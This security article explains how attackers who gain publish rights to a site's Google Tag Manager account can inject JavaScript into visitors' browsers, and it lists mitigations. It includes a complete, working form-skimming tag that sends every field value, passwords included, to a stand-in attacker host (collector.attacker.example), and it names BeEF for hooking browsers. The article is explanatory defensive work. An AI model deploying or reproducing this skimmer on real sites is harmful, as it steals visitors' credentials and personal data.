Cybersecurity attacks from GTM Google Tags
Andres Mauricio Pardo Agudelo tinpardo@gmail.com
German Hernandez gjhernandezp@gmail.com
Introduction.
Google Tag Manager (GTM) is a tool for managing the JavaScript tags that a website loads. Marketing teams use these tags to feed advertising and analytics platforms such as Facebook Ads and Google Ads, among others.
However, GTM also lets its users create their own tags (Custom HTML tags). In practice this means that anyone with access to the GTM account configured on a website can inject arbitrary JavaScript into the browsers of every user who visits that website.
If the tag, that is, the injected JavaScript, is malicious, an attacker can compromise the information and/or the computers of the people who visit the website, among them the company's customers and its own employees. This amounts to a potential high-impact cyberattack on the company.
Because the attack is not set up from within the company, it does not touch the company's servers or internal infrastructure: the malicious code runs entirely in the visitors' browsers, and the only server-side record of it is GTM's own version history. Controls that watch the company's perimeter and servers therefore do not fire, which makes the attack hard to detect and harder still to investigate afterwards. The attacker can turn it on and off remotely at any time simply by publishing a new container version and, through the hooked browsers, can reach the machines of the company's employees, of third parties, and so on.
This document shows how such an attack is carried out, analyses its impact, and lists the controls that companies can apply to reduce the risk of it happening.
Risk rating for this attack: Critical
Ease of attack exploitation: Medium
Prerequisites
For this type of attack to succeed, the following conditions must be met:
• The target company must have the GTM container snippet installed on its website.
• The attacker must compromise a user account that holds the Publish permission on the target company's GTM container (or an account Administrator who can grant it), as shown in the following image.
Description of the risk in Colombia.
Most large companies in Colombia rely on external marketing agencies for their sales process. That makes this attack easier to carry out, since in most cases agency staff have less cybersecurity training and, because of the creative nature of their work, operate in less secure environments where they must constantly explore new tools, sources of information, and so on.
An attacker can exploit this to compromise the accounts of the advertising agencies that support companies: the agencies become the weakest link in the cybersecurity chain, even when the companies themselves run a rigorous security program.
Moreover, if an attacker compromises the accounts of a marketing agency that manages the portals of multiple companies in Colombia, the attack could have devastating effects across several sectors of Colombia, or of whichever country the attacker chooses to target. Marketing agencies can thus become a new target for cyberattacks.
In Colombia, most large-company websites (banks, universities, retail, telecommunications companies, restaurants, media, airlines, etc.) use GTM, which increases both the impact and the reach of this type of attack.
Put in a single sentence: this attack shows that the marketing area has the power to compromise an entire company, usually without being aware of it, and in most cases it is supported by marketing agencies that are equally unaware of the power they hold over the cybersecurity of the companies they serve.
Example of malicious tags.
This basic example shows part of the source code of a malicious tag with which an attacker captures whatever a user types into a form field on the website. That field may hold sensitive information such as a username or a password.
Next, a trigger is configured so that the malicious code runs on every page of the portal.
The example above is deliberately simple and serves only to explain the attack; an attacker could make it as sophisticated as hooking the visitors' browsers with a ready-made tool such as BeEF (the Browser Exploitation Framework) in order to control them.
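The following is an added example, written for this article and not the authors' own tag, that reconstructs the kind of Custom HTML tag described above: it hooks every form field on the page and sends each value the user enters to an attacker-controlled collector. The collector host and the query parameter names are assumptions. It is written in ES5 because GTM's Custom HTML validator does not accept all ES2015 syntax.

```javascript
// Added example: a malicious GTM Custom HTML tag reconstructed from the
// description in this article (not the authors' code). The collector host and
// the parameter names are assumptions.
var COLLECTOR = "https://collector.attacker.example/c"; // hypothetical attacker host

// Build the URL that carries one captured field to the collector.
// Kept as a pure function so it can be exercised outside a browser.
function buildBeaconUrl(pageUrl, fieldName, value, collector) {
  var q = new URLSearchParams({ p: pageUrl, f: fieldName, v: value });
  return (collector || COLLECTOR) + "?" + q.toString();
}

// Fire-and-forget exfiltration: an <img> request carries the data out without
// CORS errors and without anything visible in the page itself; only the
// network panel (or, briefly, the status bar) shows the request.
function imageBeacon(url) {
  var img = new Image();
  img.src = url;
}

// Attach a 'change' listener to every form field in the document. Each time
// the user leaves a field (typing a password and moving on, for instance),
// the field's name and value are sent to the collector. Returns the number
// of fields hooked so the caller can check that the hook took.
function hookForms(doc, sendBeacon) {
  var fields = doc.querySelectorAll("input, textarea, select");
  Array.prototype.forEach.call(fields, function (el) {
    el.addEventListener("change", function () {
      var name = el.name || el.id || "unnamed";
      sendBeacon(buildBeaconUrl(doc.location.href, name, el.value));
    });
  });
  return fields.length;
}

// Inside the GTM Custom HTML tag this runs on page load. The tag's trigger is
// a Page View trigger set to fire on All Pages, as the article describes.
if (typeof document !== "undefined") {
  hookForms(document, imageBeacon);
}
```

In GTM the code goes inside a `<script>` element in a Custom HTML tag, and the tag is published with an All Pages trigger; nothing on the company's servers changes, only the container version.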
Graphic description of the attack.
Example of permissions that allow an attacker to succeed.
EXAMPLES OF SOURCE CODE INJECTED IN SOME WEB SITES
Source code injected:
Website Result 1:
The effect of the injection is visible in the browser's status bar, which in this case shows a request to another website, one that could belong to an attacker.
Website Result 2:
Again the effect of the injection is visible in the browser's status bar, which shows a request to another website that could belong to an attacker.
MITIGATION CONTROLS
To prevent this type of attack, the following controls are suggested:
• Increase cybersecurity training for the personnel who administer GTM.
• Apply least privilege and need-to-know: grant each GTM user only the container permission they need (Read, Edit, Approve or Publish) and keep Publish restricted to a few accountable people.
• Implement a review and authorisation procedure for changes to the GTM container, separating the person who edits a tag from the person who approves and publishes it.
• Monitor GTM administration actions, in particular new users, permission changes and newly published container versions.
• Monitor the portal's source code, including the published GTM container, from outside the company for unexpected changes.
• Enable two-step verification with physical security keys on the Google accounts of GTM administrators.
• Harden the computers of GTM administrators.